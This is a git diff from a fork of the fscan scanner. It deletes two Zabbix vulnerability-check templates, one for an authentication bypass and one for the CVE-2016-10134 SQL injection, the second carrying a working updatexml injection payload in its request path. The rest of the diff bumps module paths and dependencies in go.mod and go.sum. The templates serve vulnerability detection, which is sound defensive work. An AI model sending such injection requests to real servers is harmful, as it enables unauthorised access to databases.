poc-yaml-zabbix-authentication-bypass -rules: - - method: GET - path: /zabbix.php?action=dashboard.view&dashboardid=1 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes("Share")) && response.body.bcontains(b"Dashboard") -detail: - author: FiveAourThe(https://github.com/FiveAourThe) - links: - - https://www.exploit-db.com/exploits/47467 \ No newline at end of file diff --git a/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml b/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml deleted file mode 100644 index 494acc6..0000000 --- a/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-zabbix-cve-2016-10134-sqli -set: - r: randomInt(2000000000, 2100000000) -rules: - - method: GET - path: >- - /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0) - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31))) -detail: - author: sharecast - links: - - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 \ No newline at end of file diff --git a/go.mod b/go.mod index b09342a..87b2ac7 100644 --- a/go.mod +++ b/go.mod @@ -1,19 +1,20 @@ -module github.com/shadow1ng/fscan +module github.com/timwhitez/fscan go 1.16 require ( github.com/denisenkom/go-mssqldb v0.10.0 github.com/go-sql-driver/mysql v1.6.0 - github.com/golang/protobuf v1.3.4 - github.com/google/cel-go v0.6.0 + github.com/golang/protobuf v1.5.2 + github.com/google/cel-go v0.7.3 github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067 - github.com/lib/pq v1.10.1 + github.com/lib/pq v1.10.2 github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca + github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4 github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 - golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de - golang.org/x/net v0.0.0-20200301022130-244492dfa37a - golang.org/x/text v0.3.2 - google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0 + golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97 + golang.org/x/net v0.0.0-20210716203947-853a461950ff + golang.org/x/text v0.3.6 + google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b ) diff --git a/go.sum b/go.sum index 341ad2e..09150ac 100644 --- a/go.sum +++ b/go.sum @@ -1,98 +1,187 @@ cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= +cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= +github.com/antihax/optional v1.0.0/go.mod h1:uupD/76wgC+ih3iEmQUL+0Ugr19nfwCT1kdvxnR2qWY= github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f h1:0cEys61Sr2hUBEXfNV8eyQP01oZuBgoMeHunebPirK8= github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f/go.mod h1:T7PbCXFs94rrTttyxjbyT5+/1V8T2TYDejxUfHJjw1Y= github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= +github.com/cncf/udpa/go v0.0.0-20201120205902-5459f2c99403/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= +github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/denisenkom/go-mssqldb v0.10.0 h1:QykgLZBorFE95+gO3u9esLd0BmbvpWp0/waNNZfHBM8= github.com/denisenkom/go-mssqldb v0.10.0/go.mod h1:xbL0rPBG9cCiLr28tMa8zpbdarY27NDyej4t/EjAShU= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= +github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= +github.com/envoyproxy/go-control-plane v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= -github.com/geoffgarside/ber v1.1.0 h1:qTmFG4jJbwiSzSXoNJeHcOprVzZ8Ulde2Rrrifu5U9w= -github.com/geoffgarside/ber v1.1.0/go.mod h1:jVPKeCbj6MvQZhwLYsGwaGI52oUorHoHKNecGT85ZCc= +github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/go-sql-driver/mysql v1.6.0 h1:BCTh4TKNUYmOmMUcQ3IipzF5prigylS7XXjEkfCHuOE= github.com/go-sql-driver/mysql v1.6.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg= github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY= github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0= -github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58= github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= -github.com/golang/protobuf v1.3.4 h1:87PNWwrRvUSnqS4dlcBU/ftvOIBep4sYuBLlh6rX2wk= github.com/golang/protobuf v1.3.4/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= -github.com/google/cel-go v0.6.0 h1:Li+angxmgvzlwDsPuFc1/nbqnq3gc4K/X7NrWjOADFI= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= +github.com/golang/protobuf v1.5.2 h1:ROPKBNFfQgOUMifHyP+KYbvpjbdoFNs+aK7DXlji0Tw= +github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= github.com/google/cel-go v0.6.0/go.mod h1:rHS68o5G1QcUv/ubiCoZ5nT5LHxRWWfS0qMzTgv42WQ= +github.com/google/cel-go v0.7.3 h1:8v9BSN0avuGwrHFKNCjfiQ/CE6+D6sW+BDyOVoEeP6o= +github.com/google/cel-go v0.7.3/go.mod h1:4EtyFAHT5xNr0Msu0MJjyGxPUgdr9DlcaPyzLt/kkt8= github.com/google/cel-spec v0.4.0/go.mod h1:2pBM5cU4UKjbPDXBgwWkiwBsVgnxknuEJ7C5TDWwORQ= +github.com/google/cel-spec v0.5.0/go.mod h1:Nwjgxy5CbjlPrtCWjeDjUyKMl8w41YBYGjsyDdqk0xA= github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= -github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= -github.com/hirochachacha/go-smb2 v1.0.10 h1:fiSNyMOOlWzfdTVk6VtvxfDGqhjNDI2iYZjd/jdtmhk= -github.com/hirochachacha/go-smb2 v1.0.10/go.mod h1:8F1A4d5EZzrGu5R7PU163UcMRDJQl4FtcxjBfsY8TZE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU= +github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw= github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067 h1:P2S26PMwXl8+ZGuOG3C69LG4be5vHafUayZm9VPw3tU= github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067/go.mod h1:2lmrmq866uF2tnje75wQHzmPXhmSWUt7Gyx2vgK1RCU= -github.com/lib/pq v1.10.1 h1:6VXZrLU0jHBYyAqrSPa+MgPfnSvTPuMgK+k0o5kVFWo= github.com/lib/pq v1.10.1/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= +github.com/lib/pq v1.10.2 h1:AqzbZs4ZoCBp+GtejcpCpcxM3zlSMx29dXbUSeVtJb8= +github.com/lib/pq v1.10.2/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= +github.com/rogpeppe/fastuuid v1.2.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca h1:NugYot0LIVPxTvN8n+Kvkn6TrbMyxQiuvKdEwFdR9vI= github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca/go.mod h1:uugorj2VCxiV1x+LzaIdVa9b4S4qGAcH6cbhh4qVxOU= +github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4 h1:OWSmL0LYmfDX2oXDt3RErvCAQpyZNUm7AFgZJ5q43sA= +github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4/go.mod h1:dG+K6/t5Skg+75lDytmXIBzl7XU4rMvBaMYOeIifBTI= github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 h1:GVFkBBJAEO3CpzIYcDDBdpUObzKwVW9okNWcLYL/nnU= github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8/go.mod h1:phLSETqH/UJsBtwDVBxSfJKwwkbJcGyy2Q/h4k+bmww= +github.com/stoewer/go-strcase v1.2.0 h1:Z2iHWqGXH00XYgqDmNgQbIBxf3wrNq0F3feEy0ainaU= +github.com/stoewer/go-strcase v1.2.0/go.mod h1:IBiWB2sKIp3wVVQ3Y035++gc+knqhUQag1KpM8ahLw8= github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5cxcmMvtA= github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0= github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= +go.opentelemetry.io/proto/otlp v0.7.0/go.mod h1:PqfVotwruBrMGOCsRd/89rSnXhoiJIqeYNgFYFoEGnI= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= -golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de h1:ikNHVSjEfnvz6sxdSPCaPt572qowuyMDMJLLm3Db3ig= +golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= +golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97 h1:/UOmuWzQfxxo9UtlXMwuQU8CMgg1eZXqTRwkSQJWKOI= +golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint v0.0.0-20210508222113-6edffad5e616/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= -golang.org/x/net v0.0.0-20200301022130-244492dfa37a h1:GuSPYbZzB5/dcLNCwLQLsg3obCJtX9IJhpXkvY7kzk0= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM= +golang.org/x/net v0.0.0-20210716203947-853a461950ff h1:j2EK/QoxYNBsXI4R7fQkkRUk8y6wnOBI+6hgPdP/6Ds= +golang.org/x/net v0.0.0-20210716203947-853a461950ff/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= +golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527 h1:uYVVQ9WP/Ds2ROhcaGPeIdVq0RIXVLwsHlnvJ+cT1So= golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210330210617-4fbd30eecc44/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1 h1:SrN+KX8Art/Sf4HNj6Zcz06G7VEz+7w9tdXTPOZ7+l4= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= -golang.org/x/text v0.3.2 h1:tW2bmiBqwgJj/UpqtC8EpXEZVYOwU0yG4iWbprSVAcs= golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= +golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= +golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= +golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28= +golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= +golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= +golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= google.golang.org/genproto v0.0.0-20200305110556-506484158171/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= -google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0 h1:N5O9PpTbQrkvH0IQ1q+mmGyg8Gt6iKcu6b6+gmz3jnA= google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= +google.golang.org/genproto v0.0.0-20200513103714-09dca8ec2884/go.mod h1:55QSHmfGQM9UVYDPBsyGGes0y52j32PQ3BqQfXhyH3c= +google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= +google.golang.org/genproto v0.0.0-20201102152239-715cce707fb0/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= +google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f h1:YORWxaStkWBnWgELOHTmDrqNlFXuVGEbhwbB5iK94bQ= +google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f/go.mod h1:ob2IJxKrgPT52GcgX759i1sleT07tiKowYBGbczaW48= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= -google.golang.org/grpc v1.27.1 h1:zvIju4sqAGvwKspUQOhwnpcqSbzi7/H6QomNNjTL4sk= google.golang.org/grpc v1.27.1/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.33.1/go.mod h1:fr5YgcSWrqhRRxogOsw7RzIpsmvOZ6IcH4kBYTpR3n0= +google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= +google.golang.org/grpc v1.36.0/go.mod h1:qjiiYl8FncCW8feJPdyg3v6XW24KsRHe+dy9BAGRRjU= +google.golang.org/grpc v1.39.0/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnDzfrE= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf 